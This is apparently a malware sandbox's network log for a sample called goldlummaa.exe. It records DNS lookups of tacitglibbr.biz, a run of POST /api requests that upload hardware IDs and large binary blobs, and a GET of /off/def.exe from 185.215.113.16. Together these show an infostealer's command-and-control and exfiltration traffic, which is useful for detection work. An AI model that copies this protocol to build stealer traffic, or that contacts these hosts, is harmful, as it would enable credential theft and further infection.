                                                                                                                Dec 18, 2024 14:18:17.961323977 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.961366892 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.961478949 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.961517096 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.962085009 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.962246895 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.962901115 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.962949038 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.962987900 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.963021994 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.963767052 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.963970900 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.964440107 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.964529037 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.966702938 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:18.114610910 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.114720106 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.114794970 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:18.115010977 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.115262985 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.115705013 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.115773916 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:18.115856886 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.115927935 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:18.116621017 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.116636992 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.116694927 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:18.117305994 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.117424965 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.117474079 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:18.118463993 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.118483067 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.118541956 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:48.977854013 CET4980780192.168.2.9185.215.113.16
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 14:17:38.040410042 CET | 62158 | 53 | 192.168.2.9 | 1.1.1.1
Dec 18, 2024 14:17:38.353465080 CET | 53 | 62158 | 1.1.1.1 | 192.168.2.9
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Dec 18, 2024 14:17:38.040410042 CET192.168.2.91.1.1.10xcf2fStandard query (0)tacitglibbr.bizA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Dec 18, 2024 14:17:38.353465080 CET1.1.1.1192.168.2.90xcf2fNo error (0)tacitglibbr.biz104.21.50.161A (IP address)IN (0x0001)false
                                                                                                                Dec 18, 2024 14:17:38.353465080 CET1.1.1.1192.168.2.90xcf2fNo error (0)tacitglibbr.biz172.67.164.37A (IP address)IN (0x0001)false
                                                                                                                • tacitglibbr.biz
                                                                                                                • 185.215.113.16
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49807 | 185.215.113.16 | 80 | 7460 | C:\Users\user\Desktop\goldlummaa.exe
Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 14:18:13.659239054 CET | 200 | OUT | GET /off/def.exe HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Host: 185.215.113.16
Dec 18, 2024 14:18:15.030055046 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                Date: Wed, 18 Dec 2024 13:18:14 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 1740288
                                                                                                                Last-Modified: Wed, 18 Dec 2024 12:15:55 GMT
                                                                                                                Connection: keep-alive
                                                                                                                ETag: "6762bcfb-1a8e00"
                                                                                                                Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49722 | 104.21.50.161 | 443 | 7460 | C:\Users\user\Desktop\goldlummaa.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:17:39 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: tacitglibbr.biz
2024-12-18 13:17:39 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-18 13:17:40 UTC | 1030 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:17:40 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=srm3g5641pj846c0emmhloj9mf; expires=Sun, 13-Apr-2025 07:04:19 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o0bcKw1ltN3C2ppOM960FBIf3kQqO28oEUB4SwNZvFBQIDUI%2BwoezcrpKN3igTqauJD2YBNsFwvNTQEf07BbqrQbJKToeWiwO9e8mttbdG3aB2JpATNsL3tWxy5VE6PXrRM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6f3419e94325-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1555&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1779402&cwnd=180&unsent_bytes=0&cid=6b875cb5af8c427b&ts=819&x=0"
2024-12-18 13:17:40 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-18 13:17:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49728 | 104.21.50.161 | 443 | 7460 | C:\Users\user\Desktop\goldlummaa.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:17:41 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 53
                                                                                                                Host: tacitglibbr.biz
2024-12-18 13:17:41 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-18 13:17:43 UTC | 1038 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:17:43 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=62dp9hs2244epr3l8m4irro2je; expires=Sun, 13-Apr-2025 07:04:21 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iz9YCV9B8kvFYORaYCXcxQSSE35RQIPhlPnLMMMJJdEwdHzbnUFEKzM8cKot%2FqfBX%2BTQaGBKtMpgmaQoWi%2BUJSeD7T5izmg8KODP6By9521zJBUESSB1fHnpfoiPrUA5isg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6f41cab8727b-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=46842&min_rtt=1839&rtt_var=27410&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=952&delivery_rate=1587819&cwnd=232&unsent_bytes=0&cid=4cdef405fb7f092e&ts=1531&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49734 | 104.21.50.161 | 443 | 7460 | C:\Users\user\Desktop\goldlummaa.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:17:44 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=7MOPAZNNL5BSB8TEC5C
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 12857
                                                                                                                Host: tacitglibbr.biz
2024-12-18 13:17:44 UTC | 12857 | OUT | Data Ascii:
--7MOPAZNNL5BSB8TEC5C
Content-Disposition: form-data; name="hwid"

277DB6F22143AFD2F9F1B7136A1E0C5E
--7MOPAZNNL5BSB8TEC5C
Content-Disposition: form-data; name="pid"

2
--7MOPAZNNL5BSB8TEC5C
Content-Disposition: form-data; name="lid"

LOGS11--Li
2024-12-18 13:17:47 UTC | 1038 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:17:47 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=c0iaa2ios7b74725kq8of8qfqf; expires=Sun, 13-Apr-2025 07:04:25 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4R0Wzk4KakfqlGBEb9jVgPcvKpwJlDC0M1oGjieHvJovpMxkTnc6T68fMskU%2BZVQzeElADfm%2BnQWw9WJX55woxkQnMElclxkRhsLM3GrkSI1rhlIYIgDHeVxGNtZfL2Jdl8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6f55aa1b8c90-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8602&min_rtt=2046&rtt_var=4854&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13797&delivery_rate=1427174&cwnd=201&unsent_bytes=0&cid=61dabf5d630a617b&ts=2474&x=0"
2024-12-18 13:17:47 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f
ok 8.46.123.189
2024-12-18 13:17:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49745 | 104.21.50.161 | 443 | 7460 | C:\Users\user\Desktop\goldlummaa.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:17:49 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=ORQDK9H7
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 15009
                                                                                                                Host: tacitglibbr.biz
2024-12-18 13:17:49 UTC | 15009 | OUT | Data Ascii:
--ORQDK9H7
Content-Disposition: form-data; name="hwid"

277DB6F22143AFD2F9F1B7136A1E0C5E
--ORQDK9H7
Content-Disposition: form-data; name="pid"

2
--ORQDK9H7
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--ORQDK9H7
Content-Di
2024-12-18 13:17:52 UTC | 1045 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:17:52 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=spmlu003dk4v9g4v4fa1g78n30; expires=Sun, 13-Apr-2025 07:04:29 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pH4T7X1%2B%2F2dJw5fTW5y%2BtVYbCLbVKML6ZrniRO3Hd%2BAU6CmtdtZ787KeWDickFXEQG1iElgyakOmh0Z0Tyg0fGQNScm19z%2FSKRbk5hVCdxbyVnNCAa4aR9W3iBdQo4M1dS0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6f6e7a404291-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=24141&min_rtt=7678&rtt_var=13420&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15938&delivery_rate=380307&cwnd=207&unsent_bytes=0&cid=a1bc459036a5f000&ts=3602&x=0"
2024-12-18 13:17:52 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f
ok 8.46.123.189
2024-12-18 13:17:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49756 | 104.21.50.161 | 443 | 7460 | C:\Users\user\Desktop\goldlummaa.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:17:54 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=HQNCZSSBD
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 20531
                                                                                                                Host: tacitglibbr.biz
2024-12-18 13:17:54 UTC | 15331 | OUT | Data Ascii:
--HQNCZSSBD
Content-Disposition: form-data; name="hwid"

277DB6F22143AFD2F9F1B7136A1E0C5E
--HQNCZSSBD
Content-Disposition: form-data; name="pid"

3
--HQNCZSSBD
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--HQNCZSSBD
Conten
2024-12-18 13:17:57 UTC | 1046 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:17:57 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=cr9km2kt8cv5h48un7palvabqs; expires=Sun, 13-Apr-2025 07:04:34 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rheeuW0eSUulWNOzB8xddxmddCAxCtAHCHDALk7a0SxcVipRG9wWess0tlOvR3y2mfkMMHJ4W1ED8IG48uMScMNdB2x%2FSKt86%2FsDY8a%2BAYd36%2B19iYRioixsgktwOsaj9%2F4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6f8f69eb42cd-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=24206&min_rtt=1606&rtt_var=14096&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21483&delivery_rate=1818181&cwnd=242&unsent_bytes=0&cid=418722a9daf83cdf&ts=3086&x=0"
2024-12-18 13:17:57 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f
ok 8.46.123.189
2024-12-18 13:17:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49769 | 104.21.50.161 | 443 | 7460 | C:\Users\user\Desktop\goldlummaa.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:17:59 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=2HTYL7EE2V9NXASFFZZ
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 1246
                                                                                                                Host: tacitglibbr.biz
2024-12-18 13:17:59 UTC | 1246 | OUT | Data Ascii:
--2HTYL7EE2V9NXASFFZZ
Content-Disposition: form-data; name="hwid"

277DB6F22143AFD2F9F1B7136A1E0C5E
--2HTYL7EE2V9NXASFFZZ
Content-Disposition: form-data; name="pid"

1
--2HTYL7EE2V9NXASFFZZ
Content-Disposition: form-data; name="lid"

LOGS11--Li
2024-12-18 13:18:01 UTC | 1040 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:18:01 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=gehcic6l86jv4qlp75kditcgaq; expires=Sun, 13-Apr-2025 07:04:39 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2FfiPvU%2FnitPDAJhcL6XTb%2B08G7QZdMuhtb1XZjbaN1345qovPoKWgMy6jibqX2pYahwESqzYPR9M%2B10FkuMP1zfE1WWZOes8HXkT7FI96%2Bl1NFAEk8WpEs395i3jxhYtWI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6fae3a577c6f-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1810&rtt_var=690&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2163&delivery_rate=1573275&cwnd=212&unsent_bytes=0&cid=fff4b0a76869e06a&ts=2261&x=0"
2024-12-18 13:18:01 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f
ok 8.46.123.189
2024-12-18 13:18:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49780 | 104.21.50.161 | 443 | 7460 | C:\Users\user\Desktop\goldlummaa.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:18:03 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=L0F67C2UNUCPCVBJERP
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 551737
                                                                                                                Host: tacitglibbr.biz
2024-12-18 13:18:03 UTC | 15331 | OUT | Data Ascii:
--L0F67C2UNUCPCVBJERP
Content-Disposition: form-data; name="hwid"

277DB6F22143AFD2F9F1B7136A1E0C5E
--L0F67C2UNUCPCVBJERP
Content-Disposition: form-data; name="pid"

1
--L0F67C2UNUCPCVBJERP
Content-Disposition: form-data; name="lid"

LOGS11--Li
                                                                                                                Data Ascii: c/|%Ai8H(how%z%=: [*$5xb#Me5K7:UUy}.fvRzdv^?}tfYN-3rh(8NBxOJ{mA }v3e:$y2PMM":@>74s
                                                                                                                2024-12-18 13:18:03 UTC15331OUTData Raw: 58 1e 15 cd d6 51 0d aa 42 d3 40 e8 d7 39 69 5f 89 8e cb eb bf 8b 5d f4 d9 9e e8 7c 35 ec 5c c1 2a 5f 87 a2 c8 c9 3a 17 a5 3f 1e dd e1 53 1f f6 9b e7 fc 55 28 41 11 ae 4c ea 9c 5c cc 68 d2 57 49 4c 4f 7c fb f9 2c ab 72 05 80 e3 9a 55 97 06 6c 20 42 6a 30 12 d9 e7 be 68 b9 6d ce f5 99 df c2 a3 60 9d 7e bf 82 04 50 b1 f6 ef 83 af 8c 1b 4d 69 3b 77 33 ae bd 8d 66 d0 39 10 67 aa ab e8 3b c4 94 6e ef 4b dc 6f 1c b0 60 3f 44 4e 1b f7 a5 1c 7d ec 52 aa 72 d9 b9 fc c0 93 b5 80 a9 96 47 0b de aa b3 79 52 a0 f8 aa ee c9 37 1d 41 8c 4f 9c dd 02 28 ed 8a 95 1b 9c 95 fc cc e6 be a0 fd 28 2a 3b e0 80 dd ac 20 a5 ec 7f 63 5a 0f 02 7b dc 06 61 c8 74 36 01 e4 f3 92 d4 b5 8e 0f b0 fb c2 4d 80 09 4c 01 54 51 57 9a 08 c1 19 ea f8 a0 d2 22 5a c6 cf d7 e3 44 e7 3f bd 25 90 5c
                                                                                                                Data Ascii: XQB@9i_]|5\*_:?SU(AL\hWILO|,rUl Bj0hm`~PMi;w3f9g;nKo`?DN}RrGyR7AO((*; cZ{at6MLTQW"ZD?%\
                                                                                                                2024-12-18 13:18:03 UTC15331OUTData Raw: b8 a5 07 cb 81 5f 3f a3 83 60 23 a6 71 4c 23 e2 0f d0 7f ef 62 e5 7b c3 2e df 36 c5 a7 17 b4 5d c2 8d b0 61 8e ed 9d 0c 55 ac 82 08 22 ca e3 56 1e fe 80 86 62 a9 c8 5a 8d a7 4e ff 3c 54 af e5 c7 16 5a 46 aa 58 ff 95 3d 98 1d 1d 8a ab 05 23 7e 2e cf ab 00 6c 68 37 07 34 4e b1 33 ee b9 88 56 ca 61 57 e4 6b dc e2 04 06 a5 7a c2 2e ed 92 ef 65 20 df 33 0f b5 41 e0 8a 55 be d7 f2 cb ea 26 b1 28 96 e4 31 04 e6 b1 cf f8 8d 74 16 3b 1b 16 7c 69 af 8d f4 3f 4d 4e 97 eb 09 2b 11 63 3a 87 e6 01 9b 0a d9 8a a4 e4 99 a4 c7 dd 99 36 4d b5 37 bc 5e d8 f1 9a e4 f8 92 34 05 d5 29 6a 40 01 33 34 93 de 48 e9 66 22 01 a2 5d e2 fb 29 92 fb 08 7a dc 93 ca 0b be 0f a3 8b d1 51 83 78 e0 56 72 02 ce eb fe 18 73 fe 9a 90 b3 9e 9e 32 fa da f9 5e 69 8d 07 9c 46 bd fa 58 6a 3e 46 1f
                                                                                                                Data Ascii: _?`#qL#b{.6]aU"VbZN<TZFX=#~.lh74N3VaWkz.e 3AU&(1t;|i?MN+c:6M7^4)j@34Hf"])zQxVrs2^iFXj>F
                                                                                                                2024-12-18 13:18:03 UTC15331OUTData Raw: 35 3f 4c 96 e4 1d a7 fa fb 04 8b 50 7d d7 0a 4e 1a 7c fc 7d 09 d1 1e 73 54 b6 88 9d c3 ec 8d 45 6f 1f 4f 5a 8c 50 65 7c cf 86 79 08 27 4e da ce 15 fa ea da bb a9 e5 c1 9b 2b ff d4 6b 89 82 2d 6e b8 34 4d dc cf c7 20 4d 2a e4 e0 5e 4c d1 06 d2 85 d4 2c 97 80 6c 5b c3 33 4e e1 5d 19 bf a0 aa 07 e8 3c 24 c8 1c 97 7b 4f cd 1b 35 10 c3 76 b8 1b 8d b7 58 c2 6f 0d 23 43 ce 5d a9 f2 aa c4 00 51 c6 4a 3f 69 f5 03 1d c9 ca d4 d1 b0 97 c9 55 c5 f3 06 04 08 e1 5e e6 4c 7d a2 ad 42 08 1c 12 cb df ce ad b9 81 09 9b dc 6f 71 d0 2c 46 2a 92 34 d6 f6 b7 4e 9f ae 41 32 9b d7 8b 13 a8 93 f1 32 45 c7 37 53 7e e3 b2 5f 92 e5 fe 5e c1 42 92 f3 a7 38 a9 61 54 14 35 e5 b5 52 42 13 ef f6 1c 6f 76 29 77 ff 60 05 26 14 04 8b b1 37 3d ab 2a 89 13 bf 67 bb f1 5a 76 f4 99 ba 6e 67 00
                                                                                                                Data Ascii: 5?LP}N|}sTEoOZPe|y'N+k-n4M M*^L,l[3N]<${O5vXo#C]QJ?iU^L}Boq,F*4NA22E7S~_^B8aT5RBov)w`&7=*gZvng
                                                                                                                2024-12-18 13:18:03 UTC15331OUTData Raw: b3 39 a7 56 2b 88 0d d7 b5 75 fb 74 bd d8 7a ed 9b 22 44 10 d5 ac 69 a4 4a 63 b7 c6 c8 ec 50 fd dc df 53 ac 5d fa 6b 93 76 89 9c 3b 3e 64 52 b6 ad 00 22 44 9d ef ef fe 6c 45 ce 14 eb 1f 15 05 93 21 df 97 e7 1c b2 e4 41 66 da d5 b2 f3 d0 a2 20 c0 ff ca b4 43 c0 16 59 e1 2a 48 7c 42 4c 3c 8a c0 dd 21 c2 7b 91 aa fc 49 bd ab e4 57 a7 25 23 1e 40 d4 13 3f 93 2a 8f 77 eb 61 c1 a4 73 d2 42 46 13 42 99 48 39 95 2c ae 91 9a 3a a6 4a ae 99 24 31 76 2a 27 da 04 82 63 a1 e8 d5 91 a5 40 b2 21 90 04 b5 85 34 f4 d2 44 41 6d b8 c5 5e 7b 55 e6 b9 1d ae 59 d5 65 54 d8 b8 71 d1 68 99 67 2e 66 1d c3 1f f2 72 f1 9d fd 79 92 36 35 de 4d 51 37 09 77 47 9c a5 ae e5 41 19 c2 08 7e c6 3d 6a 37 71 05 cc 22 1f c1 4a 54 8d 63 95 f0 92 08 36 ba bf 67 a6 78 ac 2f 52 02 9c 6c ed 7d 6a
                                                                                                                Data Ascii: 9V+utz"DiJcPS]kv;>dR"DlE!Af CY*H|BL<!{IW%#@?*wasBFBH9,:J$1v*'c@!4DAm^{UYeTqhg.fry65MQ7wGA~=j7q"JTc6gx/Rl}j
2024-12-18 13:18:10 UTC | 1043 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:18:10 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
